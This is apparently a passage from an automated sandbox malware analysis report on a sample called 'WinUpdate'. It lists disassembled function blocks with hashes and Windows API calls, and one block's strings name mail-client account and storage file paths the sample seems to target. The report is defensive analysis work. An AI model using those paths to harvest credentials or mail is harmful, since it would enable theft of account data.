                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                • Opcode ID: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                                                                                • Instruction ID: 628ed4293515944fb4ff5177b0ed0b0109413660cb9ab4ef9b2c29076bfe53c7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F02839140612B6D212D3649C87F5F32A6EFC96B1BB98124FE18BE191EF31DCD28463
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,02E66C6C), ref: 02E65AFA
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65B2D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65B55
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,02E66C6C), ref: 02E65B62
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,02E66C6C), ref: 02E65B6E
                                                                                                                                                                                                                                                                                                • _abort.LIBCMT ref: 02E65B74
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2d3b885d97532495cf04bdd6df3d59344c0568cc72f0ad73e1e0d0fa2c2d0779
                                                                                                                                                                                                                                                                                                • Instruction ID: 5cc94c6fd108f44608f87786e5644d426dd5d55412c3c3542d100451c941bbbd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d3b885d97532495cf04bdd6df3d59344c0568cc72f0ad73e1e0d0fa2c2d0779
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EF0CD71BC4902A6D76132357C5CF7F2B2B8FC17F5BE8E515F81596180FF2488524564
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61E89: lstrlenW.KERNEL32(?,?,?,?,?,02E610DF,?,?,?,00000000), ref: 02E61E9A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61E89: lstrcatW.KERNEL32(?,?,?,02E610DF,?,?,?,00000000), ref: 02E61EAC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61E89: lstrlenW.KERNEL32(?,?,02E610DF,?,?,?,00000000), ref: 02E61EB3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61E89: lstrlenW.KERNEL32(?,?,02E610DF,?,?,?,00000000), ref: 02E61EC8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61E89: lstrcatW.KERNEL32(?,02E610DF,?,02E610DF,?,?,?,00000000), ref: 02E61ED3
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 02E6122A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6173A: _strlen.LIBCMT ref: 02E61855
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6173A: _strlen.LIBCMT ref: 02E61869
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                                                                                                • Opcode ID: ba19f20d8f643ebac02d204a51ace53f1254b575c52bf8d3d78abecd56332b57
                                                                                                                                                                                                                                                                                                • Instruction ID: 67dfa7f7f004f8ebbd3316de76bd65e3addc2904c1a2a6cded690d1e2798e6c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba19f20d8f643ebac02d204a51ace53f1254b575c52bf8d3d78abecd56332b57
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621B679ED0348AAEB1096D4DC96BFE733AEF40754F006546F609EB2D0E6B15D808B58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C61
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10014C74
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10014BF2,00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002), ref: 10014C97
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                • Opcode ID: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                                                                                • Instruction ID: b1000cfdb8d1dca94868537454e3314dce1bc17294372af6874ad0ad3cb996e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873052653539bccc7e1ea00198fc24244249cfb0554d021f73da006c918f9e5c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAF06230901228BBEB41DF90DC48FAEBFB8EF15355F514168F909A6160CF309E92DB90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02E64AEA,?,?,02E64A8A,?,02E72238,0000000C,02E64BBD,00000000,00000000), ref: 02E64B59
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02E64B6C
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,02E64AEA,?,?,02E64A8A,?,02E72238,0000000C,02E64BBD,00000000,00000000,00000001,02E62082), ref: 02E64B8F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                • Opcode ID: 6ad94f6e9e8e5f0991bae26f0e14c1aa11723907e385dfb35ca87d43ba1d6e4e
                                                                                                                                                                                                                                                                                                • Instruction ID: 4cb024cb2789b1ba8769f56cbf1dfc03093586c4c147560dc61885e1a75a9057
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ad94f6e9e8e5f0991bae26f0e14c1aa11723907e385dfb35ca87d43ba1d6e4e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F0A431EC0209BFDB219F51DC1CFAEBFBAEF087A5F808154F805A2180DB718991CA50
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                                                                                • Instruction ID: b33cccb8fbb3b2afb8450da89680e76c8306b4c6ac74daa2382c705215a82a31
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a457cb0477eb42b08a3a08fc8a8e94251b23341f2866997a7d328c6d90e6a15
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B41B236A00200DFDB14CF78C981A5EB3E5EF89754F6A4168E515EF291EB32ED41CB81
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1001962B
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10019687
                                                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
                                                                                                                                                                                                                                                                                                • Instruction ID: 6d2579429703740ef37404fee318dbdf00b11e5c7429adf95d1d5b6a0b07cec0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B001A272601725BF671296B65CCCC7F7AADDFC6EA5326022DFE04CA245DA71CD4281B0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 02E6715C
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02E6717F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02E65702
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02E671A5
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E671B8
                                                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02E671C7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bf3aa49858736d32fbbf7fc2f3cb8c6937c570a093df27e0a90df5aaeb6e7134
                                                                                                                                                                                                                                                                                                • Instruction ID: 00a1238863cb43450fbaebc1f6a43031333d12eeafb840dc3649b5a70302d7f6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf3aa49858736d32fbbf7fc2f3cb8c6937c570a093df27e0a90df5aaeb6e7134
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76018872BC52257B23211AB75C4CD7BBD6EDAC2EEC354952BFD04C7204DB658C0185B0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(1000A5B7,1000A5B7,?,100160F1,10015AE2,?,?,1000C7AC,?,?,?,?,?,1000A4CA,1000A5B7,?), ref: 10016B05
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016B3A
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016B61
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B6E
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B77
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
                                                                                                                                                                                                                                                                                                • Instruction ID: ac220c7f5632b09d9213959bcab330a47a9ba60472251cba742aca4957c4ce2f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6701D13A648611A6D216D6744CC6E4B32A9EBC97A13794128FA19DE182FF31CCD25061
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,02E6636D,02E65713,00000000,?,02E62249,?,?,02E61D66,00000000,?,?,00000000), ref: 02E65B7F
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65BB4
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65BDB
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E65BE8
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E65BF1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a48196054b7e4d35f658fe9c5228bbb336a4d61d80ce5da8043b32f66ab4f954
                                                                                                                                                                                                                                                                                                • Instruction ID: 56ab4b34e7a9d0d3aed50fd15fce2a5ec062662ef33c06d6667e94b3633d6016
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a48196054b7e4d35f658fe9c5228bbb336a4d61d80ce5da8043b32f66ab4f954
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E701F4B27C4603A7961266352C9CE7B2B2B9BC26F47E4B024F816A6141EF6488128524
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,02E610DF,?,?,?,00000000), ref: 02E61E9A
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,02E610DF,?,?,?,00000000), ref: 02E61EAC
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,02E610DF,?,?,?,00000000), ref: 02E61EB3
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,02E610DF,?,?,?,00000000), ref: 02E61EC8
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,02E610DF,?,02E610DF,?,?,?,00000000), ref: 02E61ED3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 70ba17da91ffb8059e900baa38efb6e4e297609ba7ae2dc3cd64a64e9f84d013
                                                                                                                                                                                                                                                                                                • Instruction ID: 32309364c9a21bc1a988a917f1ad0794fcf9e7ab37e3cd5bc2716a23164d4c6a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70ba17da91ffb8059e900baa38efb6e4e297609ba7ae2dc3cd64a64e9f84d013
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0E9269C01147AD221375BAC89EBF777DEFC5BA4B444019FA0C87180DB54585282B5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CCAD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CCBF
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CCD1
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CCE3
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001CCF5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                                                                                • Instruction ID: 705fac4b2ef0ed0d18e498dac5b3377924e7d1501aba8971cd3dfab6f4dcb135
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF06D31408A189BC640CB68E9C2C1A33F9EF88B917AC4809F48DDF500CB31FDC28AA4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E691D0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: RtlFreeHeap.NTDLL(00000000,00000000,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?), ref: 02E65734
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: GetLastError.KERNEL32(?,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?,?), ref: 02E65746
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E691E2
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E691F4
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E69206
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E69218
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c94c60816e1318aafb3aa6bd0cc2022b518348c36b7ce716d34ce4bdee566bbb
                                                                                                                                                                                                                                                                                                • Instruction ID: e398a10122e23813518f8a77dff743b4fac1d7e59e8c6676c63417320c161eb5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c94c60816e1318aafb3aa6bd0cc2022b518348c36b7ce716d34ce4bdee566bbb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F06272AD4244A7C670EB55F5CDC377BDAEB007A83A9AC45F809D7901CB30F8D08A60
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10015885
